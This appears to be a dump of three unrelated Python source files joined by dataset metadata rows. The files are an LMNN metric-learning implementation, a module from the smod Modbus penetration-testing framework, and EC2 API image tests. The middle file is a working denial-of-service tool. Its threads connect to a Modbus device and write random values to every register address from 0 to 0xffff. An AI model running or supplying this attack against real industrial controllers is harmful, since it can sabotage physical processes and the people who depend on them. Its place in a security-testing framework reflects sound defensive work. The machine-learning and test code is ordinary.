target_neighbors = self._select_target_neighbors_wrapper(
X_valid, y_valid, classes)
# Compute the gradient part contributed by the target neighbors
grad_static = self._compute_grad_static(X_valid, target_neighbors)
# Compute the pull loss coefficient
pull_loss_coef = (1. - self.weight_push_loss) / self.weight_push_loss
grad_static *= pull_loss_coef
# Decide how to store the impostors
if self.impostor_store == 'sparse':
use_sparse = True
elif self.impostor_store == 'list':
use_sparse = False
else:
# auto: Use a heuristic based on the data set size
use_sparse = X_valid.shape[0] > 6500
# Create a dictionary of parameters to be passed to the optimizer
disp = self.verbose - 2 if self.verbose > 1 else -1
optimizer_params = {'method': 'L-BFGS-B',
'fun': self._loss_grad_lbfgs,
'jac': True,
'args': (X_valid, y_valid, classes,
target_neighbors, grad_static,
use_sparse),
'x0': transformation,
'tol': self.tol,
'options': dict(maxiter=self.max_iter, disp=disp),
'callback': self._callback
}
# Call the optimizer
self.n_iter_ = 0
opt_result = minimize(**optimizer_params)
# Reshape the solution found by the optimizer
self.components_ = opt_result.x.reshape(-1, X_valid.shape[1])
# Stop timer
t_train = time.time() - t_train
if self.verbose:
cls_name = self.__class__.__name__
# Warn the user if the algorithm did not converge
if not opt_result.success:
warn('[{}] LMNN did not converge: {}'.format(
cls_name, opt_result.message),
ConvergenceWarning)
print('[{}] Training took {:8.2f}s.'.format(cls_name, t_train))
# Optionally store information returned by the optimizer
if self.store_opt_result:
self.opt_result_ = opt_result
return self
def transform(self, X):
"""Applies the learned transformation to the given data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data samples.
Returns
-------
X_embedded: array, shape (n_samples, n_components)
The data samples transformed.
Raises
------
NotFittedError
If :meth:`fit` has not been called before.
"""
check_is_fitted(self, ['components_'])
X = check_array(X)
return np.dot(X, self.components_.T)
def _transform_without_checks(self, X):
"""Same as transform but without validating the inputs.
Parameters
----------
X : array, shape (n_samples, n_features)
Data samples.
Returns
-------
X_embedded: array, shape (n_samples, n_components)
The data samples transformed.
"""
return np.dot(X, self.components_.T)
def _validate_params(self, X, y):
"""Validate parameters as soon as :meth:`fit` is called.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training samples.
y : array-like, shape (n_samples,)
The corresponding training labels.
Returns
-------
X : array, shape (n_samples, n_features)
The validated training samples.
y_inverse : array, shape (n_samples,)
The validated training labels, encoded to be integers in
the range(0, n_classes).
classes_inverse_non_singleton : array, shape (n_classes_non_singleton,)
The non-singleton classes, encoded as integers in [0, n_classes).
init : string or numpy array of shape (n_features_a, n_features_b)
The validated initialization of the linear transformation.
Raises
-------
TypeError
If a parameter is not an instance of the desired type.
ValueError
If a parameter's value violates its legal value range or if the
combination of two or more given parameters is incompatible.
"""
# Find the appearing classes and the class index for each sample
classes, y_inverse = np.unique(y, return_inverse=True)
classes_inverse = np.arange(len(classes))
# Ignore classes that have less than 2 samples (singleton classes)
class_sizes = np.bincount(y_inverse)
mask_singleton_class = class_sizes == 1
singleton_classes, = np.where(mask_singleton_class)
if len(singleton_classes):
warn('There are {} singleton classes that will be ignored during '
'training. A copy of the inputs `X` and `y` will be made.'
.format(len(singleton_classes)))
mask_singleton_sample = np.asarray([yi in singleton_classes for
yi in y_inverse])
X = X[~mask_singleton_sample].copy()
y_inverse = y_inverse[~mask_singleton_sample].copy()
# Check that there are at least 2 non-singleton classes
n_classes_non_singleton = len(classes) - len(singleton_classes)
if n_classes_non_singleton < 2:
raise ValueError('LargeMarginNearestNeighbor needs at least 2 '
'non-singleton classes, got {}.'
.format(n_classes_non_singleton))
classes_inverse_non_singleton = classes_inverse[~mask_singleton_class]
# Check the preferred embedding dimensionality
if self.n_components is not None:
_check_scalar(self.n_components, 'n_components',
integer_types, 1)
if self.n_components > X.shape[1]:
raise ValueError('The preferred embedding dimensionality '
'`n_components` ({}) cannot be greater '
'than the given data dimensionality ({})!'
.format(self.n_components, X.shape[1]))
# If warm_start is enabled, check that the inputs are consistent
_check_scalar(self.warm_start, 'warm_start', bool)
if self.warm_start and hasattr(self, 'components_'):
if self.components_.shape[1] != X.shape[1]:
raise ValueError('The new inputs dimensionality ({}) does not '
'match the input dimensionality of the '
'previously learned transformation ({}).'
.format(X.shape[1],
self.components_.shape[1]))
_check_scalar(self.n_neighbors, 'n_neighbors', integer_types, 1,
X.shape[0] - 1)
_check_scalar(self.max_iter, 'max_iter', integer_types, 1)
_check_scalar(self.tol, 'tol', float, 0.)
_check_scalar(self.weight_push_loss, 'weight_push_loss', float, 0., 1.)
if self.weight_push_loss == 0:
raise ValueError('`weight_push_loss` cannot be zero.')
_check_scalar(self.max_impostors, 'max_impostors', integer_types, 1)
_check_scalar(self.impostor_store, 'impostor_store', string_types)
_check_scalar(self.n_jobs, 'n_jobs', integer_types)
_check_scalar(self.verbose, 'verbose', integer_types, 0)
if self.impostor_store not in ['auto', 'sparse', 'list']:
raise ValueError("`impostor_store` must be 'auto', 'sparse' or "
"'list'.")
if self.callback is not None:
if not callable(self.callback):
raise ValueError('`callback` is not callable.')
# Check how the linear transformation should be initialized
init = self.init
if isinstance(init, np.ndarray):
init = check_array(init)
# Assert that init.shape[1] = X.shape[1]
if init.shape[1] != X.shape[1]:
raise ValueError('The input dimensionality ({}) of the given '
'linear transformation `init` must match the '
'dimensionality of the given inputs `X` ({}).'
.format(init.shape[1], X.shape[1]))
# Assert that init.shape[0] <= init.shape[1]
if init.shape[0] > init.shape[1]:
raise ValueError('The output dimensionality ({}) of the given '
'linear transformation `init` cannot be '
'greater than its input dimensionality ({}).'
.format(init.shape[0], init.shape[1]))
if self.n_components is not None:
# Assert that self.n_components = init.shape[0]
if self.n_components != init.shape[0]:
raise ValueError('The preferred embedding dimensionality '
'`n_components` ({}) does not match '
'the output dimensionality of the given '
'linear transformation `init` ({})!'
.format(self.n_components,
init.shape[0]))
elif init in ['pca', 'identity']:
pass
else:
raise ValueError("`init` must be 'pca', 'identity', or a numpy "
"array of shape (n_components, n_features).")
# Check the preferred number of neighbors
min_non_singleton_size = class_sizes[~mask_singleton_class].min()
if self.n_neighbors >= min_non_singleton_size:
warn('`n_neighbors` (={}) is not less than the number of '
'samples in the smallest non-singleton class (={}). '
'`n_neighbors_` will be set to {} for estimation.'
.format(self.n_neighbors, min_non_singleton_size,
min_non_singleton_size - 1))
self.n_neighbors_ = min(self.n_neighbors, min_non_singleton_size - 1)
neighbors_params = self.neighbors_params
if neighbors_params is not None:
_check_scalar(neighbors_params, 'neighbors_params', dict)
neighbors_params.setdefault('n_jobs', self.n_jobs)
# Attempt to instantiate a NearestNeighbors instance here to
# raise any errors before actually fitting
NearestNeighbors(n_neighbors=self.n_neighbors_, **neighbors_params)
return X, y_inverse, classes_inverse_non_singleton, init
def _initialize(self, X, init):
"""
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
init : string or numpy array of shape (n_features_a, n_features)
The initialization of the linear transformation.
Returns
-------
transformation : array, shape (n_components, n_features)
The initialized linear transformation.
"""
transformation = init
if self.warm_start and hasattr(self, 'components_'):
transformation = self.components_
elif isinstance(init, np.ndarray):
pass
elif init == 'pca':
pca = PCA(n_components=self.n_components,
random_state=self.random_state_)
t_pca = time.time()
if self.verbose:
print('[{}] Finding principal components...'.format(
self.__class__.__name__))
sys.stdout.flush()
pca.fit(X)
if self.verbose:
t_pca = time.time() - t_pca
print('[{}] Found principal components in {:5.2f}s.'.format(
self.__class__.__name__, t_pca))
transformation = pca.components_
elif init == 'identity':
if self.n_components is None:
transformation = np.eye(X.shape[1])
else:
transformation = np.eye(self.n_components, X.shape[1])
return transformation
def _select_target_neighbors_wrapper(self, X, y, classes=None):
"""Find the target neighbors of each data sample.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding training labels indices.
classes : array, shape (n_classes,), optional (default=None)
The non-singleton classes, encoded as integers in [0, n_classes).
If None (default), they will be inferred from ``y``.
Returns
-------
target_neighbors: array, shape (n_samples, n_neighbors)
An array of neighbors indices for each sample.
"""
t_start = time.time()
if self.verbose:
print('[{}] Finding the target neighbors...'.format(
self.__class__.__name__))
sys.stdout.flush()
neighbors_params = self.neighbors_params
if neighbors_params is None:
neighbors_params = {}
neighbors_params.setdefault('n_jobs', self.n_jobs)
target_neighbors = _select_target_neighbors(
X, y, self.n_neighbors_, classes=classes, **neighbors_params)
if self.verbose:
print('[{}] Found the target neighbors in {:5.2f}s.'.format(
self.__class__.__name__, time.time() - t_start))
return target_neighbors
def _compute_grad_static(self, X, target_neighbors):
"""Compute the gradient contributed by the target neighbors.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
target_neighbors : array, shape (n_samples, n_neighbors)
The k nearest neighbors of each sample from the same class.
Returns
-------
grad_target_neighbors, shape (n_features, n_features)
An array with the sum of all outer products of
(sample, target_neighbor) pairs.
"""
t_grad_static = time.time()
if self.verbose:
print('[{}] Computing static part of the gradient...'.format(
self.__class__.__name__))
n_samples, n_neighbors = target_neighbors.shape
row = np.repeat(range(n_samples), n_neighbors)
col = target_neighbors.ravel()
tn_graph = csr_matrix((np.ones(target_neighbors.size), (row, col)),
shape=(n_samples, n_samples))
grad_target_neighbors = _sum_weighted_outer_differences(X, tn_graph)
if self.verbose:
t_grad_static = time.time() - t_grad_static
print('[{}] Computed static part of the gradient in {:5.2f}s.'
.format(self.__class__.__name__, t_grad_static))
return grad_target_neighbors
def _callback(self, transformation):
"""Called after each iteration of the optimizer.
Parameters
----------
transformation : array, shape(n_components, n_features)
The solution computed by the optimizer in this iteration.
"""
if self.callback is not None:
self.callback(transformation, self.n_iter_)
self.n_iter_ += 1
def _loss_grad_lbfgs(self, transformation, X, y, classes, target_neighbors,
grad_static, use_sparse):
"""Compute the loss and the loss gradient w.r.t. ``transformation``.
Parameters
----------
transformation : array, shape (n_components * n_features,)
The current (flattened) linear transformation.
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding training labels.
classes : array, shape (n_classes,)
The non-singleton classes, encoded as integers in [0, n_classes).
target_neighbors : array, shape (n_samples, n_neighbors)
The target neighbors of each sample.
grad_static : array, shape (n_features, n_features)
The (weighted) gradient component caused by target neighbors,
that stays fixed throughout the algorithm.
use_sparse : bool
Whether to use a sparse matrix to store the impostors.
Returns
-------
loss: float
The loss based on the given transformation.
grad: array, shape (n_components * n_features,)
The new (flattened) gradient of the loss.
"""
n_samples, n_features = X.shape
transformation = transformation.reshape(-1, n_features)
self.components_ = transformation
if self.n_iter_ == 0:
self.n_iter_ += 1
if self.verbose:
header_fields = ['Iteration', 'Objective Value',
'#Active Triplets', 'Time(s)']
header_fmt = '{:>10} {:>20} {:>20} {:>10}'
header = header_fmt.format(*header_fields)
cls_name = self.__class__.__name__
print('[{}]'.format(cls_name))
print('[{}] {}\n[{}] {}'.format(cls_name, header,
cls_name, '-' * len(header)))
t_funcall = time.time()
X_embedded = self._transform_without_checks(X)
# Compute (squared) distances to the target neighbors
n_neighbors = target_neighbors.shape[1]
dist_tn = np.zeros((n_samples, n_neighbors))
for k in range(n_neighbors):
dist_tn[:, k] = row_norms(X_embedded -
X_embedded[target_neighbors[:, k]],
squared=True)
# Add the margin to all (squared) distances to target neighbors
dist_tn += 1
# Find the impostors and compute (squared) distances to them
impostors_graph = self._find_impostors(
X_embedded, y, classes, dist_tn[:, -1], use_sparse)
# Compute the push loss and its gradient
loss, grad_new, n_active_triplets = \
_compute_push_loss(X, target_neighbors, dist_tn, impostors_graph)
# Compute the total gradient
grad = np.dot(transformation, grad_static + grad_new)
grad *= 2
# Add the (weighted) pull loss to the total loss
metric = np.dot(transformation.T, transformation)
loss += np.dot(grad_static.ravel(), metric.ravel())
if self.verbose:
t_funcall = time.time() - t_funcall
values_fmt = '[{}] {:>10} {:>20.6e} {:>20,} {:>10.2f}'
print(values_fmt.format(self.__class__.__name__, self.n_iter_,
loss, n_active_triplets, t_funcall))
sys.stdout.flush()
return loss, grad.ravel()
def _find_impostors(self, X_embedded, y, classes, margin_radii,
use_sparse=True):
"""Compute the (sample, impostor) pairs exactly.
Parameters
----------
X_embedded : array, shape (n_samples, n_components)
An array of transformed samples.
y : array, shape (n_samples,)
The corresponding (possibly encoded) class labels.
classes : array, shape (n_classes,)
The non-singleton classes, encoded as integers in [0, n_classes).
margin_radii : array, shape (n_samples,)
(Squared) distances of samples to their farthest target
neighbors plus margin.
use_sparse : bool, optional (default=True)
Whether to use a sparse matrix to store the (sample, impostor)
pairs.
Returns
-------
impostors_graph : coo_matrix, shape (n_samples, n_samples)
Element (i, j) is the distance between samples i and j if j is an
impostor to i, otherwise zero.
"""
n_samples = X_embedded.shape[0]
if use_sparse:
# Initialize a sparse (indicator) matrix for impostors storage
impostors_sp = csr_matrix((n_samples, n_samples), dtype=np.int8)
for class_id in classes[:-1]:
ind_in, = np.where(y == class_id)
ind_out, = np.where(y > class_id)
# Split ind_out x ind_in into chunks of a size that fits
# in memory
imp_ind = _find_impostors_blockwise(
X_embedded[ind_out], X_embedded[ind_in],
margin_radii[ind_out], margin_radii[ind_in])
if len(imp_ind):
# sample impostors if they are too many
if len(imp_ind) > self.max_impostors:
imp_ind = self.random_state_.choice(
imp_ind, self.max_impostors, replace=False)
dims = (len(ind_out), len(ind_in))
ii, jj = np.unravel_index(imp_ind, shape=dims)
# Convert indices to refer to the original data matrix
imp_row = ind_out[ii]
imp_col = ind_in[jj]
new_imp = csr_matrix((np.ones(len(imp_row), dtype=np.int8),
(imp_row, imp_col)), dtype=np.int8,
shape=(n_samples, n_samples))
impostors_sp = impostors_sp + new_imp
impostors_sp = impostors_sp.tocoo(copy=False)
imp_row = impostors_sp.row
imp_col = impostors_sp.col
# Make sure we do not exceed max_impostors
n_impostors = len(imp_row)
if n_impostors > self.max_impostors:
ind_sampled = self.random_state_.choice(
n_impostors, self.max_impostors, replace=False)
imp_row = imp_row[ind_sampled]
imp_col = imp_col[ind_sampled]
imp_dist = _paired_distances_blockwise(X_embedded, imp_row,
imp_col)
else:
# Initialize lists for impostors storage
imp_row, imp_col, imp_dist = [], [], []
for class_id in classes[:-1]:
ind_in, = np.where(y == class_id)
ind_out, = np.where(y > class_id)
# Split ind_out x ind_in into chunks of a size that fits in
# memory
imp_ind, dist_batch = _find_impostors_blockwise(
X_embedded[ind_out], X_embedded[ind_in],
margin_radii[ind_out], margin_radii[ind_in],
return_distance=True)
if len(imp_ind):
# sample impostors if they are too many
if len(imp_ind) > self.max_impostors:
ind_sampled = self.random_state_.choice(
len(imp_ind), self.max_impostors, replace=False)
imp_ind = imp_ind[ind_sampled]
dist_batch = dist_batch[ind_sampled]
dims = (len(ind_out), len(ind_in))
ii, jj = np.unravel_index(imp_ind, shape=dims)
# Convert indices to refer to the original data matrix
imp_row.extend(ind_out[ii])
imp_col.extend(ind_in[jj])
imp_dist.extend(dist_batch)
imp_row = np.asarray(imp_row, dtype=np.intp)
imp_col = np.asarray(imp_col, dtype=np.intp)
imp_dist = np.asarray(imp_dist)
# Make sure we do not exceed max_impostors
n_impostors = len(imp_row)
if n_impostors > self.max_impostors:
ind_sampled = self.random_state_.choice(
n_impostors, self.max_impostors, replace=False)
imp_row = imp_row[ind_sampled]
imp_col = imp_col[ind_sampled]
imp_dist = imp_dist[ind_sampled]
impostors_graph = coo_matrix((imp_dist, (imp_row, imp_col)),
shape=(n_samples, n_samples))
return impostors_graph
########################
# Some core functions #
#######################
def _select_target_neighbors(X, y, n_neighbors, classes=None, **nn_kwargs):
"""Find the target neighbors of each data sample.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding (encoded) training labels.
n_neighbors : int
The number of target neighbors to select for each sample in X.
classes : array, shape (n_classes,), optional (default=None)
The non-singleton classes, encoded as integers in [0, n_classes).
If None (default), they will be inferred from ``y``.
**nn_kwargs : keyword arguments
Parameters to be passed to a :class:`neighbors.NearestNeighbors`
instance except from ``n_neighbors``.
Returns
-------
target_neighbors: array, shape (n_samples, n_neighbors)
The indices of the target neighbors of each sample.
"""
target_neighbors = np.zeros((X.shape[0], n_neighbors), dtype=np.intp)
nn = NearestNeighbors(n_neighbors=n_neighbors, **nn_kwargs)
if classes is None:
classes = np.unique(y)
for class_id in classes:
ind_class, = np.where(y == class_id)
nn.fit(X[ind_class])
neigh_ind = nn.kneighbors(return_distance=False)
target_neighbors[ind_class] = ind_class[neigh_ind]
return target_neighbors
def _find_impostors_blockwise(X_a, X_b, radii_a, radii_b,
return_distance=False, block_size=8):
"""Find (sample, impostor) pairs in blocks to avoid large memory usage.
Parameters
----------
X_a : array, shape (n_samples_a, n_components)
Transformed data samples from class A.
X_b : array, shape (n_samples_b, n_components)
Transformed data samples from class B.
radii_a : array, shape (n_samples_a,)
Squared distances of the samples in ``X_a`` to their margins.
radii_b : array, shape (n_samples_b,)
Squared distances of the samples in ``X_b`` to their margins.
block_size : int, optional (default=8)
The maximum number of mebibytes (MiB) of memory to use at a time for
calculating paired squared distances.
return_distance : bool, optional (default=False)
Whether to return the squared distances to the impostors.
Returns
-------
imp_indices : array, shape (n_impostors,)
Unraveled indices of (sample, impostor) pairs referring to a matrix
of shape (n_samples_a, n_samples_b).
imp_distances : array, shape (n_impostors,), optional
imp_distances[i] is the squared distance between samples imp_row[i] and
imp_col[i], where
imp_row, imp_col = np.unravel_index(imp_indices, shape=(n_samples_a,
n_samples_b))
"""
n_samples_a = X_a.shape[0]
bytes_per_row = X_b.shape[0] * X_b.itemsize
block_n_rows = int(block_size*1024*1024 // bytes_per_row)
imp_indices, imp_distances = [], []
# X_b squared norm stays constant, so pre-compute it to get a speed-up
X_b_norm_squared = row_norms(X_b, squared=True)[np.newaxis, :]
for chunk in gen_batches(n_samples_a, block_n_rows):
# The function `sklearn.metrics.pairwise.euclidean_distances` would
# add an extra ~8% time of computation due to input validation on
# every chunk and another ~8% due to clipping of negative values.
distances_ab = _euclidean_distances_without_checks(
X_a[chunk], X_b, squared=True, Y_norm_squared=X_b_norm_squared,
clip=False)
ind_b, = np.where((distances_ab < radii_a[chunk, None]).ravel())
ind_a, = np.where((distances_ab < radii_b[None, :]).ravel())
ind = np.unique(np.concatenate((ind_a, ind_b)))
if len(ind):
ind_plus_offset = ind + chunk.start * X_b.shape[0]
imp_indices.extend(ind_plus_offset)
if return_distance:
# We only need to do clipping if we return the distances.
distances_chunk = distances_ab.ravel()[ind]
# Clip only the indexed (unique) distances
np.maximum(distances_chunk, 0, out=distances_chunk)
imp_distances.extend(distances_chunk)
imp_indices = np.asarray(imp_indices)
if return_distance:
return imp_indices, np.asarray(imp_distances)
else:
return imp_indices
def _compute_push_loss(X, target_neighbors, dist_tn, impostors_graph):
"""
Parameters
----------
X : array, shape (n_samples, n_features)
The training input samples.
target_neighbors : array, shape (n_samples, n_neighbors)
Indices of target neighbors of each sample.
dist_tn : array, shape (n_samples, n_neighbors)
(Squared) distances of samples to their target neighbors.
impostors_graph : coo_matrix, shape (n_samples, n_samples)
Element (i, j) is the distance between sample i and j if j is an
impostor to i, otherwise zero.
Returns
-------
loss : float
The push loss caused by the given target neighbors and impostors.
grad : array, shape (n_features, n_features)
The gradient of the push loss.
n_active_triplets : int
The number of active triplet constraints.
"""
n_samples, n_neighbors = dist_tn.shape
imp_row = impostors_graph.row
imp_col = impostors_graph.col
dist_impostors = impostors_graph.data
loss = 0
shape = (n_samples, n_samples)
A0 = csr_matrix(shape)
sample_range = range(n_samples)
n_active_triplets = 0
for k in range(n_neighbors - 1, -1, -1):
loss1 = np.maximum(dist_tn[imp_row, k] - dist_impostors, 0)
ac, = np.where(loss1 > 0)
n_active_triplets += len(ac)
A1 = csr_matrix((2 * loss1[ac], (imp_row[ac], imp_col[ac])), shape)
loss2 = np.maximum(dist_tn[imp_col, k] - dist_impostors, 0)
ac, = np.where(loss2 > 0)
n_active_triplets += len(ac)
A2 = csc_matrix((2 * loss2[ac], (imp_row[ac], imp_col[ac])), shape)
val = (A1.sum(1).ravel() + A2.sum(0)).getA1()
A3 = csr_matrix((val, (sample_range, target_neighbors[:, k])), shape)
A0 = A0 - A1 - A2 + A3
loss += np.dot(loss1, loss1) + np.dot(loss2, loss2)
grad = _sum_weighted_outer_differences(X, A0)
return loss, grad, n_active_triplets
##########################
# Some helper functions #
#########################
def _paired_distances_blockwise(X, ind_a, ind_b, squared=True, block_size=8):
"""Equivalent to row_norms(X[ind_a] - X[ind_b], squared=squared).
Parameters
----------
X : array, shape (n_samples, n_features)
An array of data samples.
ind_a : array, shape (n_indices,)
An array of sample indices.
ind_b : array, shape (n_indices,)
Another array of sample indices.
squared : bool (default=True)
Whether to return the squared distances.
block_size : int, optional (default=8)
The maximum number of mebibytes (MiB) of memory to use at a time for
calculating paired (squared) distances.
Returns
-------
distances: array, shape (n_indices,)
An array of pairwise, optionally squared, distances.
"""
bytes_per_row = X.shape[1] * X.itemsize
batch_size = int(block_size*1024*1024 // bytes_per_row)
n_pairs = len(ind_a)
distances = np.zeros(n_pairs)
for chunk in gen_batches(n_pairs, batch_size):
distances[chunk] = row_norms(X[ind_a[chunk]] - X[ind_b[chunk]], True)
return distances if squared else np.sqrt(distances, out=distances)
def _sum_weighted_outer_differences(X, weights):
"""Compute the sum of weighted outer pairwise differences.
Parameters
----------
X : array, shape (n_samples, n_features)
An array of data samples.
weights : csr_matrix, shape (n_samples, n_samples)
A sparse weights matrix.
Returns
-------
sum_weighted_outer_diffs : array, shape (n_features, n_features)
The sum of all outer weighted differences.
"""
weights_sym = weights + weights.T
diagonal = weights_sym.sum(1).getA()
laplacian_dot_X = diagonal * X - safe_sparse_dot(weights_sym, X,
dense_output=True)
result = np.dot(X.T, laplacian_dot_X)
return result
def _check_scalar(x, name, target_type, min_val=None, max_val=None):
"""Validate scalar parameters type and value.
Parameters
----------
x : object
The scalar parameter to validate.
name : str
The name of the parameter to be printed in error messages.
target_type : type or tuple
Acceptable data types for the parameter.
min_val : float or int, optional (default=None)
The minimum value value the parameter can take. If None (default) it
is implied that the parameter does not have a lower bound.
max_val: float or int, optional (default=None)
The maximum valid value the parameter can take. If None (default) it
is implied that the parameter does not have an upper bound.
Raises
-------
TypeError
If the parameter's type does not match the desired type.
ValueError
If the parameter's value violates the given bounds.
"""
if not isinstance(x, target_type):
raise TypeError('`{}` must be an instance of {}, not {}.'
.format(name, target_type, type(x)))
if min_val is not None and x < min_val:
raise ValueError('`{}`= {}, must be >= {}.'.format(name, x, min_val))
if max_val is not None and x > max_val:
raise ValueError('`{}`= {}, must be <= {}.'.format(name, x, max_val))
#####################################################################
# Convenience function to construct the trivial LMNN - KNN pipeline #
#####################################################################
def make_lmnn_pipeline(
n_neighbors=3, n_components=None, init='pca', warm_start=False,
max_impostors=500000, neighbors_params=None, weight_push_loss=0.5,
impostor_store='auto', max_iter=50, tol=1e-5, callback=None,
store_opt_result=False, verbose=0, random_state=None, n_jobs=1,
n_neighbors_predict=None, weights='uniform', algorithm='auto',
leaf_size=30, n_jobs_predict=None, **kwargs):
"""Constructs a LargeMarginNearestNeighbor - KNeighborsClassifier pipeline.
See LargeMarginNearestNeighbor module documentation for details.
Parameters
----------
n_neighbors_predict : int, optional (default=None)
The number of neighbors to use during prediction. If None (default)
the value of ``n_neighbors`` used to train the model is used.
weights : str or callable, optional (default = 'uniform')
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
n_jobs_predict : int, optional (default=None)
The number of parallel jobs to run for neighbors search during
prediction. If None (default), then the value of ``n_jobs`` is used.
memory : None, str or object with the joblib.Memory interface, optional
Used to cache the fitted transformers of the pipeline. By default,
no caching is performed. If a string is given, it is the path to
the caching directory. Enabling caching triggers a clone of
the transformers before fitting. Therefore, the transformer
instance given to the pipeline cannot be inspected
directly. Use the attribute ``named_steps`` or ``steps`` to
inspect estimators within the pipeline. Caching the
transformers is advantageous when fitting is time consuming.
Returns
-------
lmnn_pipe : Pipeline
A Pipeline instance with two steps: a ``LargeMarginNearestNeighbor``
instance that is used to fit the model and a ``KNeighborsClassifier``
instance that is used for prediction.
Examples
--------
>>> from pylmnn import make_lmnn_pipeline
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import train_test_split
>>> X, y = load_iris(return_X_y=True)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... stratify=y, test_size=0.7, random_state=42)
>>> lmnn_pipe = make_lmnn_pipeline(n_neighbors=3, n_neighbors_predict=3,
... random_state=42)
>>> lmnn_pipe.fit(X_train, y_train) # doctest: +ELLIPSIS
Pipeline(...)
>>> print(lmnn_pipe.score(X_test, y_test))
0.971428571429
"""
memory = kwargs.pop('memory', None)
if kwargs:
raise TypeError('Unknown keyword arguments: "{}"'
.format(list(kwargs.keys())[0]))
lmnn = LargeMarginNearestNeighbor(
n_neighbors=n_neighbors, n_components=n_components, init=init,
warm_start=warm_start, max_impostors=max_impostors,
neighbors_params=neighbors_params, weight_push_loss=weight_push_loss,
impostor_store=impostor_store, max_iter=max_iter, tol=tol,
callback=callback, store_opt_result=store_opt_result, verbose=verbose,
random_state=random_state, n_jobs=n_jobs)
if n_neighbors_predict is None:
n_neighbors_predict = n_neighbors
if n_jobs_predict is None:
n_jobs_predict = n_jobs
knn = KNeighborsClassifier(
n_neighbors=n_neighbors_predict, weights=weights, algorithm=algorithm,
leaf_size=leaf_size, n_jobs=n_jobs_predict)
return Pipeline([('lmnn', lmnn), ('knn', knn)], memory=memory)
| bsd-3-clause | 7,088,095,768,476,751,000 | 37.836907 | 115 | 0.587134 | false | 4.153374 | false | false | false |
enddo/smod | Application/modules/modbus/dos/writeAllRegister.py | 1 | 2327 | import os
import threading
import random
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
from System.Lib import ipcalc
down = False
class Module:
info = {
'Name': 'DOS Write All Register',
'Author': ['@enddo'],
'Description': ("DOS With Write All Register Function"),
}
options = {
'RHOST' :['' ,True ,'The target IP address'],
'RPORT' :[502 ,False ,'The port number for modbus protocol'],
'UID' :['' ,True ,'Modbus Slave UID.'],
'Threads' :[1 ,False ,'The number of concurrent threads'],
'Output' :[False ,False ,'The stdout save in output directory']
}
output = ''
def exploit(self):
moduleName = self.info['Name']
print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start'
for i in range(int(self.options['Threads'][0])):
if(self.options['RHOST'][0]):
thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],))
thread.start()
THREADS.append(thread)
else:
break
for thread in THREADS:
thread.join()
if(down):
self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING)
break
if(self.options['Output'][0]):
open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n')
self.output = ''
def printLine(self,str,color):
self.output += str + '\n'
if(str.find('[+]') != -1):
print str.replace('[+]',color + '[+]' + bcolors.ENDC)
elif(str.find('[-]') != -1):
print str.replace('[-]',color + '[+]' + bcolors.ENDC)
else:
print str
def do(self,ip):
global down
for i in range(0xffff):
if(down):
break
c = connectToTarget(ip,self.options['RPORT'][0])
if(c == None):
down = True
return None
try:
self.printLine('[+] Write on Register Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN)
ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(hex(i|0x1111),16),registerValue=int(hex(random.randint(0,16**4-1)|0x1111),16)),timeout=timeout, verbose=0)
ans = ModbusADU_Answer(str(ans))
self.printLine('[+] Response is :',bcolors.OKGREEN)
ans.show()
except:
pass
| gpl-2.0 | 2,596,153,615,724,404,700 | 28.455696 | 240 | 0.619252 | false | 2.796875 | false | false | false |
hayderimran7/ec2-api | ec2api/tests/functional/api/test_images.py | 2 | 14762 | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
import testtools
from ec2api.tests.functional import base
from ec2api.tests.functional import config
CONF = config.CONF
class ImageTest(base.EC2TestCase):
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_ebs_image_type(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertEqual("ebs", image['RootDeviceType'],
"Image is not EBS image")
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_ebs_image_volume_properties(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertTrue(image['RootDeviceName'])
self.assertTrue(image['BlockDeviceMappings'])
